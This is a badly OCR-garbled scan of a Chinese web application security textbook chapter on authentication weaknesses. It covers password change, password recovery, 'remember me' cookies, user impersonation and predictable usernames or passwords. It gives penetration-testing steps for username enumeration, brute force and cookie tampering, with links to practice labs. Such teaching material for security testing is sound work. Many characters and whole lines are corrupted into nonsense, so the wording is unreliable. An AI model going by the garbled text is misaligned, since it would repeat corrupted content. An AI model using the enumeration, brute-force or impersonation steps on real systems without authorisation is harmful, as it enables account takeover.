(5) 如 果 没 有 发 现 证 书 传输 不 安全 的 情况 ， 留 意 任 何 明显 被 
编码 或 模糊 处 理 的 数据 。 如 果 这 些 数据 中 包括 敏感 数据 ， 其 模糊 算 
法 可 能 遭受 逆 同 工程 。 

(6) 如 果 使 用 HTTPS 提 交 证 书 ， 但 使 用 HTTP 加 载 登 录 表 单 ， 
那么 应 用 程序 惑 容易 遭受 中 间 人 攻击 ， 攻 击 者 也 可 能 使 用 这 种 攻击 
手段 获取 证 书 。 


尝试 访问 


http://mdsec.net/auth/88/ 
http://mdsec.net/auth/90/ 
http://mdsec.net/auth/97/ 


6.2.5 ”密码 修改 功能 


令 人 柯 怪 的 是 ， 许 多 Web 应 用 程序 并 不 允许 用 户 修改 其 密码 。 但 
是 ， 出 于 两 个 方面 的 原因 ， 精 心 设计 的 验证 机 制 需要 这 种 功能 。 

口 定期 强制 修改 密码 可 降低 某 一 密码 成 为 密码 猜测 攻击 目标 的 可 
能 性 ， 同 时 降低 攻击 者 不 需要 检测 即 可 使 用 被 攻破 密码 的 可 能 性 ， 由 
此 降低 密码 被 攻击 的 概率 。 

口 怀疑 目 己 的 密码 已 被 攻破 的 用 户 需 要 立即 修改 密码 ， 以 降低 未 
授权 使 用 概率 。 虽 然 密 码 修 改 功能 是 一 个 高 效 验 证 机 制 的 必要 组 成 部 
T, 但 从 设计 来 看 ， 它 往往 易于 遭受 攻击 。 在 主要 登录 功能 中 特意 避 
免 的 漏洞 通常 在 密码 修改 功能 中 重复 出 现 。 许 多 Web 应 用 程序 的 密码 
修改 功能 不 需要 验证 即 可 访问 ， 并 为 攻击 者 提供 某 些 信息 或 允许 攻击 
者 执行 某 些 操作 。 

口 提供 详细 的 错误 消 轧 ， 说 明 被 请 求 的 用 户 名 征 否 有 效 。 

口 允许 攻击 者 无 限制 猜测 “ 现 有 密码 ”字段 。 

口 在 验证 现 有 密码 后 ， 仪 检查 “新 密码 ”与 “确认 狐 密 码 ” 字 段 的 值 
是 否 相 同 ， 人 允许 攻 击 者 不 需 入侵 即 可 成 功 查 明 现 有 密码 。 

典型 的 密码 修改 功能 通 第 包含 一 个 相对 较 大 的 逻辑 判定 树 。 应 用 
程序 需要 确认 用 户 、 验 证 提供 的 现 有 密码 、 集 成 任何 账户 锁定 防御 、 
对 提交 的 新 密码 进行 相互 比较 并 根据 密码 强度 规则 进行 比较 ， 以 及 以 
适当 的 方式 同 用 户 返 回 任何 错误 条 件 。 为 此 ， 密 码 修改 功能 通常 包 合 
难以 察觉 的 可 用 于 破坏 整个 机 制 的 逻辑 缺陷 。 


渗透 测试 步骤 


(1) 确定 应 用 程序 中 的 所 有 密码 修改 功能 。 即 使 公布 的 内 容 
(published content) 中 没有 明确 的 密码 修改 功能 链接 ， 应 用 程序 仍 
然 可 能 实施 这 种 功能 。 我 们 已 在 第 4 章 中 说 明了 发 现 应 用 程序 中 隐 
闫 内容 的 各 种 技巧 。 

(2) 使 用 无 效 的 用 户 名 、 无 效 的 现 有 密码 及 不 匹配 的 “新 密 
码 ” 和 “确认 新 密码 ” 值 癌 密码 修改 功能 提交 各 种 请 求 。 

(3) 设法 确定 任何 可 用 于 用 户 名 枚 举 或 蛮 力 攻击 的 行为 (如 
6.2.2 节 和 6.2.3 节 所 述 ) 。 


Vo ”提示 ”如果 密 码 修改 表单 只 可 由 验证 用 户 访问 ， 且 其 中 并 
无 用 户 名 字段 ， 表 单 中 仍 有 可 能 包含 一 个 任意 用 户 名 。 表 单 可 能 将 
用 户 名 保存 在 一 个 可 被 轻易 修改 的 隐藏 子 段 中 。 如 果 在 字段 中 没有 
发 现 用 户 名 ， 设 法 使 用 和 主 登 录 表单 中 相同 的 参数 提交 男 一 个 包含 
用 户 名 的 参数 。 这 种 技巧 有 时 可 成 功 覆 也 当 前 用 户 的 用 户 名 ， 使 攻 
击 者 能 够 同 其 他 用 户 的 证 书 发 动 蛮 力 攻 击 ， 即 使 在 主 登 录 页 面 不 可 
能 实施 这 种 攻击 。 


尝试 访问 


http://mdsec.net/auth/104/ 


http://mdsec.net/auth/117/ 
http://mdsec.net/auth/120/ 
http://mdsec.net/auth/125/ 
http://mdsec.net/auth/129/ 
http://mdsec.net/auth/135/ 


6.2.6 min eRe 


SAREAD TE, BOK DIC SHO il eA OE 
主要 登录 功能 中 避免 的 问题 ， 如 用 户 名 枚 举 。 

除 这 种 缺陷 外 ， 起 记 密 码 功 能 设计 方面 的 缺点 往往 使 它 成 为 应 用 
程序 总 体验 证 逻辑 中 最 薄弱 的 环节 。 下 面 介 绍 儿 种 常见 的 设计 缺点 。 

口 态 记 和 密码 功能 妾 第 癌 用 户 提 出 一 个 次 要 质询 以 代 闪 主 要 登录 功 
能 ， 如 图 6-5 所 示 。 与 试图 猜测 用 户 密 码 相 比 ， 啊 应 这 种 质询 对 攻击 者 
来 说 更 容易 一 些 。 母 亲 的 娘家 姓 、 纪 念 日 、 最 喜欢 的 颜色 等 问题 的 答 
案 要 比 可 能 的 密码 的 数量 少 得 多 。 而 且 ， 这 些 问 题 的 答案 党 第 隐藏 在 
公开 的 信息 中 ， 和 意志 坚定 的 攻击 者 无 须 花 费 多 大 精力 即 可 找到 答案 。 


orgot Your Password or User ID? 


Jser ld: Tim 
User Id, you provided a secret question 


Your secret question, provided during registration, ts: 


U live on in sierra vista 


许多 时 候 ， 应 用 程序 允许 用 户 在 注册 阶段 设 定 他 们 目 己 的 密码 恢 
复 质 询 与 啊 应 ， 而 用 户 很 有 可 能 会 设置 极其 不 安全 的 质询 ， 这 也 
许 是 因为 用 户 错误 地 认为 应 用 程序 仅 同 他 们 目 己 提出 这 些 质询 ， 
例如 : “我 拥有 一 只 船 吗 ? "在 这 种 情况 下 ， 布 望 获得 访问 权 的 攻 
击 者 可 使 用 目 动 攻击 手段 志 历 一 组 已 枚 举 的 或 常见 的 用 户 名 ， 记 
好 所 有 和 密码 恢复 质询 ， 并 选择 那些 看 似 最 容易 猜测 出 的 质询 发 动 
re A eee 
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口 与 密码 修改 功能 一 样 ， 即 使 应 用 程序 开发 者 在 主 登 录 页 面 阻止 
攻击 者 同 锯 码 恢 复 质询 的 啊 应 发 动 蛮 力 攻击 ， 他 们 也 往往 会 在 起 记 密 
码 功 能 中 忽略 这 种 攻击 的 可 能 性 。 如 采 应 用 程序 允许 无 限制 地 回答 密 
码 恢复 质询 ， 那 么 意志 坚定 的 攻击 者 殉 很 可 能 会 攻破 这 个 密码 。 
口 一 些 应 用 程序 使 用 一 个 简单 的 密码 “上 暗示” (可 由 用 户 在 注册 阶 
段 配 置 ) 代替 恢复 质询 。 由 于 用 户 错误 地 认为 只 有 自己 才 会 看 到 这 些 
暗示 ， 他 们 往往 设置 非常 明显 的 上 暗示， 甚至 是 和 密码 完全 相同 的 瞳 
示 。 此 外 ， 拥 有 一 组 常见 或 已 枚 举 出 的 用 户 名 的 攻击 者 可 轻易 获取 大 
量 密码 暗示， 然后 开始 实施 猜测 。 
口 在 用 户 正 确 啊 应 一 个 质询 后 ， 应 用 程序 即 允 许 用 户 重 新 控制 他 
们 的 账户 ， 这 种 机 制 非常 容易 遭受 攻击 。 执 行 这 种 机 制 的 一 个 相对 安 
全 的 方法 是 癌 用 户 在 注册 阶段 提供 的 电子 邮件 地 址 发 送 一 个 上 唯一 的 、 
无 法 猜测 的 、 存 在 时 间 限 制 的 恢复 URL。 用 户 在 儿 分 钟 内 访问 这 个 
URL 即 可 设置 一 个 新 密码 。 但 是 ， 我 们 第 第 会 过 到 其 他 一 些 在 设计 上 
存在 缺陷 的 账户 恢复 机 制 。 
me ”一些 应 用 程序 在 用 户 成 功 啊 应 一 个 质询 后 即 丫 其 透露 现 
有 与 遗 起 的 密码 ， 使 攻击 者 能 够 无 限制 地 使 用 该 账户 ， 
而 不 会 被 账户 所 有 者 检测 出 来 。 即 使 账户 所 有 者 随后 修 
改 补 攻破 的 密码 ， 攻 击 首 只 需 重 新 回答 相同 的 质询 即 可 
获得 新 密码 。 
”一 些 应 用 程序 在 用 户 成 功 完成 一 个 质询 后 ， 立 即 让 其 进 
入 一 个 不 需 验 证 的 会 话 。 这 同样 使 攻击 者 可 无 限制 地 使 
用 该 账户 ， 而 不 会 被 账户 所 有 者 检测 出 来 ， 甚 至 不 需要 
知道 用 户 的 密码 。 
”一 些 应 用 程序 采用 发 送 一 个 唯一 恢复 URL 的 机 制 ， 但 却 
将 这 个 URL 发 送 至 用 户 在 完成 质询 时 指定 的 电子 邮件 地 
址 中 。 除 能 够 记录 攻击 者 所 使 用 的 电子 邮件 地 址 外 ， 这 
种 方法 根本 无 法 提高 恢复 过 程 的 安全 性 。 


YV ”提示 即使 应 用 程序 并 未 提供 一 个 在 屏幕 上 显示 的 字段 ， 
要 求 用 户 输 入 接收 恢复 URL 的 电子 邮件 地 址 ， 它 仍 有 可 能 通过 一 个 


隐藏 表单 字段 或 cookie 传 送 这 个 地 址 。 攻 击 者 因此 获得 双重 机 会 : 
一 方面 ， 可 以 发 现 所 攻破 的 用 户 的 电子 邮件 地 址 ， 另 一 方面 ， 可 对 
这 个 地 址 进行 修改 ， 用 目 选 的 地 址 接收 恢复 URL。 


”一些 应 用 程序 允许 用 户 在 成 功 完成 一 个 质询 后 直接 重新 
设置 密码 ， 并 且 不 同 用 户 发 送 任何 电子 邮件 通知 。 这 意 
味 看 直到 所 有 者 碰巧 再 次 登录 时 才 会 注意 到 账户 被 攻击 
OUR, ME, WRB BUA BO ee IC TR 
码 ， 于 是 用 上 述 方 法 重新 设置 密码 ， 他 可 能 仍然 无 法 发 
觉 账户 已 被 攻破 。 那 么 ， 只 十 和 希望 偶尔 访问 应 用 程序 的 
攻击 者 菊 可 以 在 一 段 时 间 攻 破 一 个 用 户 账户 ， 在 另 一 段 
时 间 攻 破 男 一 个 不 同 用 户 的 账户 ， 从 而 继续 无 限制 地 使 
用 该 应 用 程序 。 


渗透 测试 步骤 


(1) 确定 应 用 程序 中 的 所 有 忘记 密码 功能 。 即 使 公布 的 内 容 
中 没有 明确 的 起 记 密 码 功 能 链接 ， 应 用 程序 仍然 可 能 实施 这 种 功能 
(请 参阅 第 4 章 了 解 相 关内 容 ) 。 

(2) 使 用 受 控制 的 账户 执行 一 次 完整 的 密码 恢复 过 程 ， 了 解 
乐 记 密 人 码 功能 的 工作 机 制 。 

(3) 如 果 恢 复 机 制 使 用 质询 ， 确 定 用 户 是 否 能 够 设 定 或 选择 
他 们 目 己 的 质询 与 啊 应 。 如 采用 户 可 设 定 或 选择 目 己 的 质询 与 啊 
应 ， 使 用 一 组 已 枚 举 的 或 常见 的 用 户 名 获取 一 些 质 询 ， 并 对 其 进行 
分 析 ， 找 出 任何 非常 容易 猜测 出 啊 应 的 质询 。 

(4) 如 果 恢 复 机 制 使 用 密码 “ 瞳 示 ”， 采 取 和 上 个 步骤 相同 的 操 
人 


(5) 设法 确定 环 记 密码 机 制 中 任何 可 用 于 用 户 名 枚 举 或 蛮 力 
攻击 的 行为 (详情 请 参阅 上 文 ) 。 

(6) 如 果 应 用 程序 在 起 记 密 码 请 求 的 响应 中 生成 一 封包 含 恢 
复 URL 的 电子 邮件 ， 获 取 大 量 这 类 URL， 并 试图 确定 任何 可 帮助 预 
测 回 其 他 用 户 发 布 URL 的 模式 。 请 使 用 和 分 析 会 话 令 牌 以 实现 预测 
相同 的 技巧 〈 请 参阅 第 7 章 了 解 相 关内 容 ) 。 


尝试 访问 


http://mdsec.net/auth/142/ 
http://mdsec.net/auth/145/ 
http://mdsec.net/auth/151/ 


6.2.7 “ 记 住 我 ”功能 


为 方便 用 户 ， 避 人 免 他 们 每 次 在 一 台 特 定 的 计算 机 上 使 用 应 用 程序 
时 需要 重复 输入 用 户 名 和 和 密码， 应 用 程序 通常 执行 “ 记 住 我 ”功能 。 这 
rac ial 致使 用 户 易 于 遭受 本 地 和 其 他 计算 机 用 户 
JI 

口 一 些 “ 记 住 我 * 功 能 通过 一 个 简单 的 cookie 执 行 ， 如 
RememberUser=pet erwiener ( 见 图 6-6) 。 辣 初始 应 用 程序 页 面 提交 这 
个 cookie 时 ， 应 用 程序 信任 该 cookie， 认 为 其 属于 通过 验证 的 用 户 ， 并 
为 该 用 户 建立 一 个 应 用 程序 会 话 ， 从 而 避 开 登录 过 程 。 攻 击 者 可 以 使 
有 ， 不 需要 任何 验证 即 可 完全 访问 应 用 

YF o 
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图 6-6 ”一 个 易 受 攻击 的 “ 记 住 我 "功能 


口 一 些 “ 记 住 我 ”功能 设置 一 个 cookie， 其 中 并 不 包含 用 户 名 ， 而 是 
使 用 一 个 持久 会 话 标识 符 ， 例 如 RememberUser=1328。 问 登录 页 面 提 
交 这 个 标识 符 时 ， 应 用 程序 查询 与 其 相关 的 用 户 ， 并 为 该 用 户 建立 一 
个 应 用 程序 会 话 。 和 普通 会 话 令 牌 一 样 ， 如 果 可 预测 或 推断 出 其 他 用 
户 的 会 话 标 识 符 ， 攻 击 者 就 可 以 表 历 大 量 可 能 的 标识 符 ， 找 到 与 应 用 
程序 用 户 相 关联 的 标识 符 ， 不 经 验证 即 可 访问 他 们 的 账户 。 请 参阅 第 7 
章 了 解 实 施 这 种 攻击 的 有 关 技 巧 。 

口 即使 cookie 中 保存 的 用 于 重新 识别 用 户 的 信息 得 到 适当 保护 


些 信息 (请 参阅 第 12 章 了 解 相 关内 容 ) 。 


渗透 测试 步骤 


(1) 激活 所 有 “ 记 住 我 * 功 能， 确定 应 用 程序 是 否 完 全 “ 记 住 ”用 
户 名 和 密码 ， 还 是 仅 记 住 用 户 名 ， 仍 然 要 求 用 户 在 随后 的 访问 中 输 
入 密码 。 如 果 采 用 后 一 种 设置 ， 该 功能 驶 不 大 可 能 存在 安全 漏洞 。 

(2) 仔细 检查 应 用 程序 设 定 的 所 有 持久 性 cookie， 以 及 其 他 本 
地 存储 机 制 中 的 持久 性 数据 ， 如 正 的 userData、Seilverlight 的 隔离 存 


储 、Flash 的 本 地 共享 对 象 。 寻 找 其 中 保存 的 任何 明确 标识 出 用 户 或 
明显 包含 可 预测 的 用 户 标识 符 的 数据 。 

(3) 即使 其 中 保存 的 数据 经 过 严密 编码 或 模糊 处 理 ， 仔 细 分 
析 这 些 数据 ， 并 比较 “ 记 住 > 几 个 非常 类 似 的 用 户 名 或 密码 的 结果 ， 
找到 任何 可 对 原始 数据 进行 逆向 工程 的 机 会 。 在 这 里 可 使 用 将 在 第 
7 章 摘 述 的 用 于 检测 会 话 令 牌 意义 和 模式 的 相同 技巧 。 

(4) 试图 修改 持久 性 cookie 的 内 容 ， 并 设法 让 应 用 程序 确信 : 
另 一 名 用 户 已 经 将 其 资料 保存 在 你 的 计算 机 中 。 


尝试 访问 


http://mdsec.net/auth/219/ 
http://mdsec.net/auth/224/ 


http://mdsec.net/auth/227/ 
http://mdsec.net/auth/229/ 
http://mdsec.net/auth/232/ 
http://mdsec.net/auth/236/ 
http://mdsec.net/auth/239/ 
http://mdsec.net/auth/245/ 


6.2.8 ”用 户 伪 装 功 能 


一 些 应 用 程序 允许 特权 用 户 伪装 成 其 他 用 户 ， 以 在 该 用 户 的 权限 
下 访问 数据 和 执行 操作 。 例 如 ， 一 些 银行 应 用 程序 允许 服务 台 操 作 员 
口头 验证 一 名 电话 用 户 ， 然 后 将 银行 的 应 用 程序 会 话 转 换 到 该 用 户 的 
权限 下 ， 以 为 其 提供 帮助 。 

伪装 功能 一 般 存 在 各 种 设计 缺陷 。 

口 伪装 功能 可 以 通过 “隐藏 ?功能 的 形式 执行 ， 不 受 弟 规 访问 控制 
管理 。 例 如 ， 任 何 知道 或 猜测 出 URL/admin/ImpersonateUser.jsp 的 人 都 
能 够 利用 该 功能 伪装 成 任何 其 他 用 户 〈 请 参阅 第 8 章 了 解 相 关内 容 ) 。 

口 当 判定 用 户 是 否 进 行 伪 装 时 ， 应 用 程序 可 能 会 信任 由 用 户 控制 
的 数据 。 例 如 ， 除 有 效 会 话 令 脾 外 ， 用 户 可 能 还 会 提交 一 个 指定 其 会 
话 当 前 所 使 用 的 账户 的 cookie。 攻 击 者 可 以 修改 这 个 值 ， 不 需 验证 即 
可 通过 其 他 用 户 的 账户 访问 应 用 程序 ， 如 图 6-7 所 示 。 


burp suite profesional =r fete] 
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Ke-7 ”一 种 易 党 攻击 的 用 户 伪装 功能 


口 如 采 应 用 程序 允许 管理 用 户 被 伪 痛 ， 那 么 伪 痛 逻辑 中 存在 的 任 
何 缺 陷 都 可 能 导致 垂直 权限 提升 漏洞 。 攻 击 者 不 仅 可 以 访问 其 他 普通 
用 户 的 数据 ， 甚 至 可 以 完全 控制 应 用 程序 。 

口 某 种 伪 北 功能 能 够 以 简单 “后 门 ”密码 的 形式 执行 ， 该 密码 可 和 
任何 用 户 名 一 起 同 标准 登录 页 面 提交 ， 以 作为 该 用 户 进 行 验 证 。 由 于 
许多 原因 ， 这 种 设计 非常 危险 ,但 攻击 者 所 获得 的 最 大 好 处 是 :他们 
可 在 实施 标准 攻击 (如 对 登录 机 制 进行 蛋 力 攻击 ) 的 过 程 中 发 现 这 个 
密码 。 如 果 后 门 密码 在 用 户 的 真实 密码 前 得 到 匹配 ， 那 么 攻击 者 怠 可 
能 发 现 后 门 密 码 功 能 ， 从 而 访问 每 一 名 用 户 的 帐户。 同样， 一 次 垩 力 
攻击 可 能 导致 两 个 不 同 的 * 触 点 ”>， 因 而 揭示 后 门 密码 ， 如 图 6-8 所 示 。 


HTTP/1.1 302 Found 

Connection: close 

Date: Thu, 10 Feb 2011 17:37:14 GMT 

Server: Microsoft-I1TS/é£.0 
HMicrosoftOfficeWebServer: 5.0 Pub 

X-Powered-By: ASP.NET 

X-AspNet-Version: 2.0.50727 

Location: /auth/290/Home.ashx?AdminOverr idesrrue 
Set-Cookie: Session Td=iFBBE452 ADEAIALOASCERSCEDS47AFAA: secure: 
HttpOnly 

Cache-Control: no-cache 

Pragma: no-cache 


图 6-8 一 次 密码 猜测 攻击 出 现 两 个 “和 触 点 ”， 说 明 应 用 程序 使 用 后 门 密码 


x 


y 


渗透 测试 步骤 


(1) 确定 应 用 程序 中 的 所 有 伪装 功能 。 即 使 公布 的 内 容 中 没 
有 明确 的 伪装 功能 链接 ， 应 用 程序 仍然 可 能 实施 这 种 功能 (请 参阅 
第 4 章 了 解 相 关内 容 ) 。 

(2) 每 斌 使 用 伪装 功能 直接 伪装 成 其 他 用 户 。 

(3) 设法 操纵 任何 由 伪装 功能 处 理 的 用 户 提 交 的 数据 ， 尝 试 


al 户 。 特 别 留意 任何 不 通过 正常 登录 页 面 提交 用 户 名 的 
情况 。 

(4) 如 果 能 够 成 功利 用 伪装 功能 ， 莹 试 伪装 成 任何 已 知 的 或 
猜测 出 的 管理 用 户 ， 以 提升 用 户 权 限 。 

(5) 实施 密码 猜测 攻击 〈 请 参阅 6.2.3 节 ) 时 ， 查 明 是 否 有 用 
户 使 用 多 个 有 效 密 码 ， 或 者 某 个 特殊 的 密码 是 否 与 几 个 用 户 名 匹 
配 。 男 外 ， 用 在 蛮 力 攻击 中 获得 的 证 书 以 许多 不 同 的 用 户 登 录 ， 检 
查 是 否 一 切 正常 。 特 别 注意 任何 “以 X 登 录 ” 的 状态 消 已 。 


尝试 访问 


http://mdsec.net/auth/272/ 
http://mdsec.net/auth/290/ 


6.2.9 ”证 书 确认 不 完善 


精心 设计 的 验证 机 制 强制 要 求 密码 满足 各 种 要 求 ， 如 最 小 密码 长 
度 和 同时 使 用 大 小 写字 符 。 相 应 地 ， 一 些 设计 不 佳 的 验证 机 制 不 仅 没 
有 强制 执行 这 些 最 佳 实践 ， 而 且 对 用 户 遵守 这 些 要 求 的 愿望 置 之 不 
理 。 

例如 ， 一 些 应 用 程序 截 短 密码 ， 只 确认 前 mn 个 字符 ; 一些 应 用 程序 
并 不 对 密码 进行 大 小 写 检 查 ， 一 些 应 用 程序 在 检查 密码 之 前 删除 不 党 
用 的 字符 《有 时 以 执行 输入 确认 为 借口 ) 。 最 近 ， 一 些 相 当 有 名 的 应 
用 程序 都 被 确认 具有 此 类 行为 ， 一 些 好 奇 用户 的 试验 和 错误 致使 人 们 
发 现 了 这 一 问题 。 

以 上 这 些 密码 确认 限制 可 显著 减少 可 能 的 密码 数量 。 通 过 实验 ， 
渗透 测试 员 可 以 判定 一 个 密码 是 否 得 到 完全 确认 ， 或 者 某 个 限制 是 否 
生效 。 然 后 整 可 以 针对 登录 机 制 的 目 动 攻击 方法 进行 调整 ， 删 除 不 必 
要 的 测试 ， 大 量 减少 攻破 用 户 账户 所 需 提 有 交 的 请 求 的 数量 。 


渗透 测试 步骤 


(1) 使 用 一 个 现 有 的 账户 ， 尝 试用 密码 的 各 种 变化 形式 进行 


登录 : 删除 最 后 一 个 字符 、 改 变 字 符 大 小 写 、 删 除 任何 特殊 排版 的 
字符 。 如 果 其 中 一 些 竹 试 取得 成 功 ， 继 续 实验 过 程 ， 竹 试 了 解 完整 
的 证 书 确认 过 程 。 

(2) 利用 得 到 的 所 有 结果 调整 自动 密码 猜测 攻击 ， 删 除 多 余 
的 测试 ， 提 高 成 功 的 几率 。 


尝试 访问 


http://mdsec.net/auth/293/ 


6.2.10 “ 非 唯一 性 用 户 


一 些 文 持 目 我 注册 的 应 用 程序 允许 用 户 指定 他 们 目 己 的 用 户 名 ， 
而 且 并 不 强制 要 求 用 户 使 用 唯一 的 用 户 名 。 虽 然 这 种 应 用 程序 极其 少 
WL, (BAe WE as Fike Dy EEA ° 

由 于 两 方面 的 原因 ， 这 种 设计 存在 一 些 缺 陷 。 

口 在 注册 阶段 或 随后 修改 密码 的 过 程 中 ， 共 至 同一 个 用 户 名 的 两 
个 用 户 可 能 碰巧 选择 相同 的 密码 。 如 果 出 现 这 种 情况 ， 应 用 程序 要 人 么 
拒绝 第 二 名 用 户 选择 的 密码 ， 要 么 允许 两 个 账户 使 用 相同 的 证 书 。 如 
果 属 于 前 者 ， 应 用 程序 将 会 同一 名 用 户 泄露 另 一 名 用 户 的 证 书 ;， 如果 
属于 后 者 ， 其 中 一 名 用 户 登 录 后 会 访问 另 一 名 用 户 的 账户 。 

口 即使 由 于 登录 失败 笑 试 次 数 方面 的 限制 ， 在 其 他 地 方 不 可 能 实 
施 这 种 攻击 ， 攻 击 者 仍然 可 以 利用 这 种 行为 成 功 实施 蛋 力 攻击 。 攻 击 
者 可 以 使 用 不 同 的 密码 ， 多 次 用 一 个 特殊 的 用 户 名 注册 ， 同 时 监控 说 
明 使 用 该 用 户 名 和 密码 的 账户 已 经 存在 的 不 同 啊 应 。 攻 击 者 不 需 以 目 
标 用 户 进行 任何 一 次 登录 尝试 ， 即 可 获取 该 用 户 的 密码 。 

设计 存在 缺陷 的 目 我 注册 功能 还 可 能 造成 用 户 枚 举 漏洞 。 如 有 果 应 
用 程序 禁止 使 用 相同 的 用 户 名 ， 那 么 攻击 者 可 以 注册 大 量 常见 的 用 户 
和 名， 从 而 确定 遭 到 拒绝 的 现 有 用 户 名 。 


渗透 测试 步骤 


(1) 如 果 应 用 程序 允许 自我 注册 ， 尝 试用 不 同 的 密码 两 次 注 
册 同 一 个 用 户 名 。 

(2) 如 果 应 用 程序 阻止 第 二 次 注册 企图 ， 也 可 以 利用 这 种 行 
为 枚 举 现 有 的 用 户 名 ， 虽 然 在 主 登录 页 面 或 其 他 地 方 不 可 能 这 样 
做 。 用 一 组 常见 的 用 户 名 进行 多 次 注册 尝试 ， 设 法 确定 被 应 用 程序 
阻止 的 已 注册 用 户 名 。 

(3) 如 果 可 成 功 注册 完全 相同 的 用 户 名 ， 尝 试用 相同 的 密码 


注册 两 个 相同 的 用 户 名 ， 以 此 确定 应 用 程序 的 行为 。 

(a) 如 果 以 上 做 法 得 到 错误 消息 ， 也 可 以 利用 这 种 行为 
实施 一 次 训 力 攻击 ， 虽 然 在 主 登 录 页 面 不 可 能 实施 这 种 攻击 。 
针对 一 个 枚 举 或 猜测 出 的 用 户 名 发 动 攻 击 ， 芝 试用 一 组 利用 密 
码 多 次 注册 这 个 用 户 名 。 如 采 应 用 程序 拒绝 某 个 特殊 的 密码 ， 
忠 可 以 发 现 目标 账户 的 现 有 密码 。 

(b) 如 果 没 有 得 到 错误 消息 ， 使 用 指定 的 证 书 登 录 ， 看 
看 出 现 什 么 结 采 。 可 能 需要 注册 几 个 用 户 ， 修 改 每 个 账户 保存 
TE 以 确定 这 种 行为 是 否 可 用 于 未 授权 访问 其 他 用 户 

y 由 o 


6.2.11 _ 可 预测 的 用 户 名 


一 些 应 用 程序 根据 某 种 可 以 预测 的 顺序 (如 cust5331 ` cust5332) 
自动 生成 账户 用 户 名 。 如 果 应 用 程序 以 这 种 方式 运转 ， 弄 清 了 用 户 名 
顺序 的 攻击 者 就 可 以 很 快 获 得 全 部 有 效用 户 名 ， 以 此 作为 后 续 攻 击 的 
基础 。 与 依赖 不 断 提交 由 词汇 驱动 请 求 的 枚 举 方 法 不 同 ， 这 种 确定 用 
户 名 的 方法 不 需 实施 入 侵 ， 也 很 少 给 应 用 程序 造成 干扰 。 


渗透 测试 步骤 


(1) 如 果 用 户 名 由 应 用 程序 生成 ， 设 法 获得 几 个 连续 的 用 户 


和 名， 看 能 否 从 中 看 出 任何 顺序 或 模式 。 

(2) 如 果 存 在 某 种 顺序 或 模式 ， 向 后 推断 列 出 所 有 可 能 的 有 
效用 户 名 。 这 种 方法 可 作为 需要 有 效用 户 名 的 登 孙 蛮 力 攻击 和 其 他 
攻击 的 基础 ， 如 利用 访问 控制 漏洞 请 参阅 第 8 章 了 解 相关 内 


A) 


尝试 访问 


http://mdsec.net/auth/169/ 


6.2.12 ”可 预测 的 初始 密码 


一 些 应 用 程序 一 次 性 或 大 批量 创建 用 户 ， 并 目 动 指定 初始 密码 ， 
然后 以 某 种 方式 将 密码 分 配给 所 有 用 户 。 这 种 生成 密码 的 方式 可 让 攻 
击 者 能 够 预测 其 他 应 用 程序 用 户 的 密码 。 基 于 内 联网 的 企业 应 用 程序 
营利 存在 这 种 漏洞 。 例 如 ， 应 用 程序 为 每 位 雇员 创建 一 个 账户 ， 并 问 
其 发 送 一 份 打印 好 的 密码 通知 。 

如 有 果 所 有 用 户 收 到 相同 的 密码 ， 或 者 根据 其 用 户 名 或 工作 职能 创 
建 的 密码 ， 这 种 密码 最 容易 被 攻 破 。 另 外 ， 生 成 的 密码 可 能 包含 某 种 
攻击 者 碍 看 少数 几 个 初始 密码 样本 即 可 确定 或 猜测 出 其 他 用 户 

J 密码。 


渗透 测试 步骤 


(1) 如 果 密 码 由 应 用 程序 生成 ， 设 法 获得 几 个 连续 的 密码 ， 
看 能 否 从 中 看 出 任何 顺序 或 模式 。 


(2) 如 果 存 在 某 种 顺序 或 模式 ， 根 据 这 种 模式 推 新 ， 获 取 其 
他 应 用 程序 用 户 的 密码 。 

(3) 如 果 密 码 呈 现 出 一 种 可 能 与 用 户 名 相 联 系 的 模式 ， 可 以 
设法 使 用 已 知 或 猜测 出 的 用 户 名 与 相应 推 呆 出 的 密码 进行 登录 。 

(4) 其 他 情况 下 ， 可 以 使 用 推断 出 的 密码 列表 作为 利用 一 组 
枚 举 出 的 用 户 名 或 稼 见 用 户 名 实施 槛 力 攻 击 的 基础 。 


尝试 访问 


http://mdsec.net/auth/172/ 


6.2.13 ”证 书 分 配 不 安全 


许多 应 用 程序 并 不 在 用 户 与 应 用 程序 正 间 交互 的 过 程 中 分 配 新 建 
账户 的 证 书 (如 通过 邮寄 或 电子 邮件 。 有 时 ， 采 用 这 种 分 配方 式 主 
要 出 于 安全 考虑 ， 例 如 ， 确 保 用 户 提供 的 邮寄 或 电子 邮件 地 址 属于 其 


本 人 。 

这 种 分 配方 式 有 时 会 带 来 安全 风险 。 例 如 ， 如 采 分 配 证 书 的 邮件 
中 同时 包含 用 户 名 和 密码 ， 没 有 给 邮件 设置 使 用 时 间 限 制 ， 没 有 要 求 
用 户 在 第 一 次 登录 时 修改 密码 ， 那 么 ， 大 多 数 甚至 是 绝 大 部 分 应 用 程 
序 用 户 都 不 会 修改 初始 证 书 ， 并 且 将 收 到 的 邮件 保存 很 长 一 段 时 间 ， 
而 未 授权 方 有 可 能 在 此 期 间 访问 这 些 分 配 证 书 的 邮件 。 

有 时 应 用 程序 并 不 分 配 证 书 ， 而 是 传送 一 个 “账户 微 活 ?URL， 用 
户 通过 它 设 置 目 己 的 初始 冤 码 。 如 有 果 发 送 给 连续 用 户 的 URL 表 现 出 时 
种 顺序 ， 攻 击 者 束 可 以 通过 注册 几 个 紧密 相连 的 用 户 确 定 这 种 顺序 ， 
以 此 推断 出 发 送 给 最 近 与 后 续 用 户 的 微 活 URL 。 

某 些 Web 应 用 程序 表现 的 一 种 相关 行为 是 ， 人 允许 新 用 户 以 看 似 安 
全 的 方式 注册 账户 ， 然 后 同 每 个 新 用 户 发 送 一 封包 含 其 完整 的 登录 证 
书 的 欢迎 电子 邮件 。 最 糟糕 的 情况 是 ， 具 有 安全 意识 的 用 户 决 定 立 即 
修改 可 能 已 被 攻破 的 密码 ， 但 随后 又 收 到 一 封 电子 邮件 ， 其 中 包含 “以 
备 日 后 参考 ”的 新 密码 。 这 种 行为 相当 奇怪， 并 且 完 全 没有 必要 ， 因 
此 ， 我 们 强烈 建议 用 户 停止 使 用 表现 出 此 类 行为 的 Web 应 用 程序 。 


渗透 测试 步骤 


(1) 获得 一 个 新 账户 。 如 果 应 用 程序 并 不 要 求 在 注册 阶段 设 
置 所 有 证 书 ， 弄 清 应 用 程序 如 何 同 新 用 户 分 配 证 书 。 
(2) 如 果 应 用 程序 使 用 账户 激活 URL， 设 法 注册 几 个 紧密 相 


连 的 新 账户 ， 确 定 收 到 的 URL 中 的 任何 顺序 。 如 果 确 定 某 种 模式 ， 
